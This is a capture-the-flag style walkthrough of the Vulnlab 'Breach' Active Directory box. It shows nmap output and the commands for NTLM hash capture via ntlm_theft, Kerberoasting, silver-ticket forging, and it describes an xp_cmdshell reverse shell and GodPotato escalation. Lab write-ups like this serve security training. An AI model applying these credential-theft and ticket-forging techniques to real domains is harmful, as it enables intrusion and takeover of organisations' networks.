# Vulnlab - Breach ```bash PORT STATE SERVICE VERSION 53/tcp open domain? 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-12 16:03:34Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM |_ssl-date: 2024-03-12T16:45:02+00:00; -20s from scanner time. |_ms-sql-info: ERROR: Script execution failed (use -d to debug) |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug) | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Issuer: commonName=SSL_Self_Signed_Fallback 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2024-03-12T16:06:32+00:00; -20s from scanner time. | ssl-cert: Subject: commonName=BREACHDC.breach.vl | Issuer: commonName=BREACHDC.breach.vl | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-03-11T16:03:04 | Not valid after: 2024-09-10T16:03:04 | MD5: 6bef15efd66e365df68a7dc73029cee7 |_SHA-1: 7fce3649341af1319d2092a07f42efd473427203 | rdp-ntlm-info: | Target_Name: BREACH | NetBIOS_Domain_Name: BREACH | NetBIOS_Computer_Name: BREACHDC | DNS_Domain_Name: breach.vl | DNS_Computer_Name: BREACHDC.breach.vl | DNS_Tree_Name: breach.vl | Product_Version: 10.0.20348 |_ System_Time: 2024-03-12T16:05:52+00:00 Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows ``` Accessing smb shares with null authentication, we'll be able to list available shares

From `share` , we'll get 3 username directories

We could have gotten domain users from brute forcing SID as well with `lookupsid.py`

We can try AS-REP roasting but this didn't showed any user with pre-authentication not required

## Coercing Authentication In share, we have write access so we can upload files in any folder other than user directories as we don't have read access there

So we can perform coerce authentication by uploading scf or lnk files but I am not sure which extension will lead to coercion so we can use `ntlm_theft` to upload all kinds of extension for this ```bash python3 ./ntlm_theft.py --generate all --server 10.8.0.136 -f @a ```

As soon as we'll upload the file, we'll receive NTLMv2 challenge/response hash of `Julia.Wong`

This will get cracked easily through hashcat using rockyou.txt

## Performing kerberoasting on mssql user We already saw that there was `svc_mssql`, it's most likely a service account which can be kerberoastable ```bash crackmapexec ldap breach.vl -u 'julia.wong' -p 'password' --kerberoasting kerberoast.txt ```

Cracking this again with hashcat

With these credentials we can try logging in on MSSQL service with `mssqclient.py` , but it gives us login failure

Since we have the mssql service account, we can forge a silver ticket and impersonate administrator user on mssql ```bash ticketer.py -nthash hash -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -spn 'MSSQL/breach.vl' administrator ```

Now we just need to enable `xp_cmdshell` as it's disabled by default

Downloading and executing netcat to get a reverse shell

This user has `SeImpersonate` privilege enabled through which we can impersonate/steal the token of any user including SYSTEM user

Using `GodPotato` to escalate our privileges

# References - https://github.com/BeichenDream/GodPotato